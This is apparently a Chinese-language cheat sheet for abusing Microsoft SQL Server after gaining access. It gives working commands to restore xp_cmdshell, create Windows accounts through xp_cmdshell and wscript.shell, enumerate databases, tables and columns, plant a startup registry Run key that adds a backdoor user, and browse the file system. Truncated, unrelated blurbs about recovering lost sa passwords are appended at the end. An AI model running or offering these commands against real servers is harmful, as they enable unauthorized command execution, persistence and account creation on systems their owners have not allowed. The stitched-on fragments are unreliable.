一 系統shell
恢復xp_cmdshell
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
使用xp_cmdshell新增使用者
exec xp_cmdshell 'net user user1 /add'
利用ole物件介面,sql server提供了一些函式訪問ole物件,分別是sp_oacreate和sp_oamethod,可以利用他們呼叫ole控制項,間接獲取乙個 shell。使用sp_oacreate呼叫物件wscript。shell賦給變數@shell,然後使用sp_oamethod呼叫@shell的屬 性run執行命令。
declare @shell int
exec sp_oacreate 'wscript.shell',@shell out
exec sp_oamethod @shell,'run',null, 'net user ray ray /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user temp zyi /add'--
二 資料庫查詢
查詢庫庫名稱存在master庫中的sysdatabases表中,sysdatabases表中的 dbid欄位的值大於6的就是使用者自己建的庫
select name from sysdatabases where dbid>6
查詢表表名稱存在xyz庫中的sysobjects表且xtype='u'
select *from sysobjects where xtype='u'
查詢字段
該錶的字段存在xyz庫中的syscolumns表,且id等於sysobjects表中test表對應的id
select * from syscolumns where id='357576312'
三 登錄檔操作
利用xp_regwrite寫登錄檔項
exec master.dbo.xp_regwrite 'hkey_local_machine','software\microsoft\windows\c urrentversion\run','shell','reg_sz','c:\windows\sys tem32\cmd.exe /c net user ray ray /add'
檢視登錄檔
exec xp_regenumvalues 'hkey_local_machine','software\microsoft\windows\c urrentversion\run'
四 檔案操作
歷遍目錄
exec master.dbo.xp_dirtree 'c:\'
獲取子目錄
exec master.dbo.xp_subdirs 'c:\'
判斷目錄或檔案是否存在
exec master..xp_fileexist 'c:\boot.ini'
忘了SA密碼的SQL SERVER
暫時還未驗證 sql2008 如果 本地連線登入補上,也忘了sa等管理賬號的密碼,可以通過單使用者連線的方式登入 sql server 2012 其他版本 此主題尚未評級 評價此主題 在某些情況下,可能必須使用startup option m.在單使用者模式下啟動 sql server 例項。例如,...
SQL Server的sa密碼丟失解決
sql server的sa密碼丟失解決 在網上看了很多如何修改sqlserver2005的密碼的方法。大多數都是轉了同乙個帖子 用windows許可權進入,然後修改當前例項屬性中的安全項,然後重新啟動就可以修改了,但是操作手順與我的sqlserver貌似不同。大概是sp1之前可以這麼做吧。首先用wi...
SYBASE ASE關於sa密碼遺忘的處理
sa 密碼忘記解決之道 su sybase cd ase install vi run etoh2 在檔案的末尾加入 psa 停止原資料庫服務 由於密碼遺忘,所以只能通過kill程序停止服務 重新啟動資料庫服務 www.2cto.com startserver f run etoh2 在啟動資訊中查...